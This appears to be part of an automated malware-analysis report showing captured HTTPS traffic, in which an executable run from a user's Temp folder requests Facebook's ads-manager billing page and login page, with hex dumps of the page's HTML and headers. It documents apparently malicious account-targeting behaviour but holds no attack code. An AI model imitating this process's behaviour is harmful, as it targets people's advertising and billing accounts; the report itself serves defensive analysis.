                                                                                                                Data Ascii: \u043a\u0438\u0439"},1],["__markup_3310c079_0_n_Ip",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__markup_3310c079_0_o_a9",{"__html":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629"},1],["__markup_3310c079_0_p_EM",{"__html":"\u0939\u093f\u0928\u094d\u0926
                                                                                                                2022-10-13 11:08:18 UTC5754INData Raw: 66 35 66 61 63 31 35 5f 30 5f 30 5f 6a 53 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 39 69 22 2c 22 75 5f 30 5f 64 5f 51 77 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6a 53 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 58 5a 22 2c 22 75 5f 30 5f 65 5f 70 45 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6a 53 22 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 53 65 72 76 69 63 65 57 6f 72 6b 65 72 4c 6f 67 69 6e 41 6e 64 4c 6f 67 6f 75 74 22 2c 22 6c 6f 67 69 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c
                                                                                                                Data Ascii: f5fac15_0_0_jS"],["__elem_45d73b5d_0_1_9i","u_0_d_Qw",1,"__markup_9f5fac15_0_0_jS"],["__elem_45d73b5d_0_0_XZ","u_0_e_pE",1,"__markup_9f5fac15_0_0_jS"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XWebLoginController",
                                                                                                                2022-10-13 11:08:18 UTC5756INData Raw: 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 5c 2f 6b 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 5c 2f 6b 22 7d 5d 5d 2c 5b 22 46 42 4c 79 6e 78 22 2c 22 73 65 74 75 70 44 65 6c 65 67 61 74 69 6f 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 4c 7a 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 6f 4a 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 4c 7a 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30
                                                                                                                Data Ascii: etInputValue",["__elem_f46f4946_0_1_\/k"],[{"__m":"__elem_f46f4946_0_1_\/k"}]],["FBLynx","setupDelegation",[],[]],["LoginFormController","init",["__elem_835c633a_0_0_Lz","__elem_45d73b5d_0_2_oJ"],[{"__m":"__elem_835c633a_0_0_Lz"},{"__m":"__elem_45d73b5d_0
                                                                                                                2022-10-13 11:08:18 UTC5757INData Raw: 5f 38 5f 69 77 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 69 77 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65
                                                                                                                Data Ascii: _8_iw"],[{"__m":"__elem_a588f507_0_8_iw"},"_9ngb","._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredRe
                                                                                                                2022-10-13 11:08:18 UTC5759INData Raw: 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 56 2f 6c 2f 30 2c 63 72 6f 73 73 2f 69 64 49 54 30 72 65 59 59 67 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 30 2f 6c 2f 30 2c 63 72 6f 73 73 2f 33 62 58 61 32 44 45 42 58 65 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d
                                                                                                                Data Ascii: ><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/idIT0reYYg0.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/3bXa2DEBXeK.css?_nc_x=
                                                                                                                2022-10-13 11:08:18 UTC5760INData Raw: 2f 79 43 2f 72 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 74 42 6b 4b 74 46 74 4f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 69 2f 6c 2f 30 2c 63 72 6f 73 73 2f 75 61 52 55 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72
                                                                                                                Data Ascii: /yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="tBkKtFtO" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/uaRUZk18yNI.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link r
                                                                                                                2022-10-13 11:08:18 UTC5762INData Raw: 63 59 55 33 63 33 32 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 67 74 42 4b 72 41 62 22 2c 22 79 56 74 2b 54 79 69 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 65 38 52 6b 4a 6f 79 22 2c 22 48 4c 57 74 71 66 72 22 5d 2c 69 64 3a 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 70 68 61 73 65 3a 30 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 74 69 5f 70 68 61 73 65 3a 30 2c 61 6c 6c 5f 70 68 61 73 65 73 3a 5b 36 33 5d 2c 68 73 72 70 3a 7b 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 33 38 32 31 39 34 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 4a 4a 44 51 59 4c 64 22 2c 22 2f 6f 64 52 52 34 57 22 2c 22 37 35 66 2b 65 52 6a 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6d 6f
                                                                                                                Data Ascii: cYU3c32","Yo2UzOh","gtBKrAb","yVt+Tyi","P/mr5VE","e8RkJoy","HLWtqfr"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63],hsrp:{hblp:{consistency:{rev:1006382194}}},allResources:["JJDQYLd","/odRR4W","75f+eRj","PycCUEM","n6W4xMH","mo
                                                                                                                2022-10-13 11:08:18 UTC5762INData Raw: 65 38 0d 0a 2c 22 46 59 2f 46 50 46 66 22 2c 22 79 53 65 57 37 48 67 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 49 61 52 2f 36 75 50 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 59 74 55 33 43 35 75 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 2f 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 2f 41 67 70 4f 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 73 65 74 50 61 67 65 49 44 28 22 37 31 35 33 39 35 32 32 31 32 33 37 30 37 34 31 32 37 31 22 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 32 32 39 32 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e
                                                                                                                Data Ascii: e8,"FY/FPFf","ySeW7Hg","8mzgYu5","IaR/6uP","LpxR5qU","R5w1rCJ","YtU3C5u","CGkH4FY","e9ANzw/","07JSiP0","dx/AgpO"]});}));</script><script>requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7153952212370741271")});</script>2292<script non
                                                                                                                2022-10-13 11:08:18 UTC5763INData Raw: 48 45 43 6c 48 7a 4b 38 38 54 4a 6f 35 69 48 4a 45 43 55 6f 4e 51 36 45 63 46 52 67 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 79 6a 4f 67 52 56 58 62 76 64 43 56 55 5a 36 39 64 47 4a 55 33 75 79 32 56 62 38 6f 72 65 74 6f 57 44 36 4b 54 54 53 65 6a 72 68 5f 57 36 4b 59 61 67 41 78 35 5f 4c 36 5f 62 43 6b 4b 51 68 39 35 42 45 4d 69 67 47 6d 73 37 44 39 6e 6f 71 41 30 61 67 63 69 67 44 31 5a 6d 53 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 36 39 39 33 30 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 68 53 74 4e 45 4d 6e 4c 6a 6d 59 70 61 37 66 52 70 78 2d 4c 69 56 30 65 71 45 5a 58 65 47 79
                                                                                                                Data Ascii: HEClHzK88TJo5iHJECUoNQ6EcFRgYK4YGTujWRX5naelYkj6Yg"]},-1],["cr:1458113",[],{__rc:[null,"Aa0yjOgRVXbvdCVUZ69dGJU3uy2Vb8oretoWD6KTTSejrh_W6KYagAx5_L6_bCkKQh95BEMigGms7D9noqA0agcigD1ZmSg"]},-1],["cr:1069930",[],{__rc:[null,"Aa0hStNEMnLjmYpa7fRpx-LiV0eqEZXeGy
                                                                                                                2022-10-13 11:08:18 UTC5765INData Raw: 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 30 68 53 74 4e 45 4d 6e 4c 6a 6d 59 70 61 37 66 52 70 78 2d 4c 69 56 30 65 71 45 5a 58 65 47 79 45 57 5f 6a 42 65 54 48 45 43 6c 48 7a 4b 38 38 54 4a 6f 35 69 48 4a 45 43 55 6f 4e 51 36 45 63 46 52 67 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 33 36 54 5f 68 30 34 4d 44 68 45 47 4b 4e 37 48 62 42 7a 71 76 66 38 32 61 42 49 7a 4b 47 6e 5a 31 7a 78 68 70 39 74 47 50 65 31 70 62 54 6d 30 34 46 70 73 67 44 37 33 6d 5f 32 39 48 6e 62 65 78 58 30 42 49 39 71 61
                                                                                                                Data Ascii: HideOnTransition"],{__rc:["LayerHideOnTransition","Aa0hStNEMnLjmYpa7fRpx-LiV0eqEZXeGyEW_jBeTHEClHzK88TJo5iHJECUoNQ6EcFRgYK4YGTujWRX5naelYkj6Yg"]},-1],["cr:1105154",[],{__rc:[null,"Aa036T_h04MDhEGKN7HbBzqvf82aBIzKGnZ1zxhp9tGPe1pbTm04FpsgD73m_29HnbexX0BI9qa
                                                                                                                2022-10-13 11:08:18 UTC5766INData Raw: 5a 4d 36 66 6a 49 75 4b 46 30 73 65 45 61 39 35 31 75 38 54 64 35 4f 36 6c 2d 6b 75 67 6c 34 5f 5a 7a 68 6e 35 6d 31 62 6e 4f 79 6c 39 6f 5a 49 4b 72 35 38 73 57 32 76 39 4c 72 6a 77 75 51 58 41 6c 6b 6e 22 5d 7d 2c 2d 31 5d 2c 5b 22 43 6f 72 65 57 61 72 6e 69 6e 67 47 4b 22 2c 5b 5d 2c 7b 66 6f 72 63 65 57 61 72 6e 69 6e 67 3a 66 61 6c 73 65 7d 2c 37 32 35 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 2c 22 41 61 30 43 44 39 56 68 4b 31 41 77 43 55 36 53 62 31 61 75 4c 2d 58 50 69 49 52 4c 73 4e 61 56 44 65 2d 59 38 43 51 64 52 52 31 4f 76 77 39 2d 31 55 4c 4c 4c 69 4c 39 36 34 4e 57 42
                                                                                                                Data Ascii: ZM6fjIuKF0seEa951u8Td5O6l-kugl4_Zzhn5m1bnOyl9oZIKr58sW2v9LrjwuQXAlkn"]},-1],["CoreWarningGK",[],{forceWarning:false},725],["cr:1344486",["ReactDOM.classic.prod"],{__rc:["ReactDOM.classic.prod","Aa0CD9VhK1AwCU6Sb1auL-XPiIRLsNaVDe-Y8CQdRR1Ovw9-1ULLLiL964NWB
                                                                                                                2022-10-13 11:08:18 UTC5768INData Raw: 48 4a 45 43 55 6f 4e 51 36 45 63 46 52 67 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 34 34 31 38 30 22 2c 5b 22 54 69 6d 65 53 70 65 6e 74 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 4c 6f 67 67 65 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 54 69 6d 65 53 70 65 6e 74 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 4c 6f 67 67 65 72 42 6c 75 65 22 2c 22 41 61 30 68 53 74 4e 45 4d 6e 4c 6a 6d 59 70 61 37 66 52 70 78 2d 4c 69 56 30 65 71 45 5a 58 65 47 79 45 57 5f 6a 42 65 54 48 45 43 6c 48 7a 4b 38 38 54 4a 6f 35 69 48 4a 45 43 55 6f 4e 51 36 45 63 46 52 67 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b
                                                                                                                Data Ascii: HJECUoNQ6EcFRgYK4YGTujWRX5naelYkj6Yg"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa0hStNEMnLjmYpa7fRpx-LiV0eqEZXeGyEW_jBeTHEClHzK88TJo5iHJECUoNQ6EcFRgYK4YGTujWRX5naelYkj6Yg"]},-1],[
                                                                                                                2022-10-13 11:08:18 UTC5769INData Raw: 67 61 74 69 6f 6e 43 6c 69 63 6b 50 6f 69 6e 74 48 61 6e 64 6c 65 72 22 5d 2c 5b 22 53 65 72 76 69 63 65 57 6f 72 6b 65 72 55 52 4c 43 6c 65 61 6e 65 72 22 2c 22 72 65 6d 6f 76 65 52 65 64 69 72 65 63 74 49 44 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 4c 6f 67 67 69 6e 67 22 2c 22 64 6f 4c 6f 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67
                                                                                                                Data Ascii: gationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLog
                                                                                                                2022-10-13 11:08:18 UTC5771INData Raw: 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 63 59 55 33 63 33 32 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 68 4b 59 30 51 4b 54 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: MH","vGt2mxz","ZEC4RrQ","mRpDwmd","cYU3c32","BIylKC4","hKY0QKT"]});}));</script></body></html>0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                2192.168.2.549702157.240.17.35443C:\Users\user\AppData\Local\Temp\2A57.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:01 UTC3765OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:02 UTC3766INHTTP/1.1 302 Found
                                                                                                                Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-resource-policy: same-origin
                                                                                                                cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                2022-10-13 11:08:02 UTC3767INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                3192.168.2.549709157.240.17.35443C:\Users\user\AppData\Local\Temp\2A57.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:02 UTC3769OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:02 UTC3770INHTTP/1.1 200 OK
                                                                                                                Vary: Accept-Encoding
                                                                                                                report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-opener-policy: unsafe-none
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
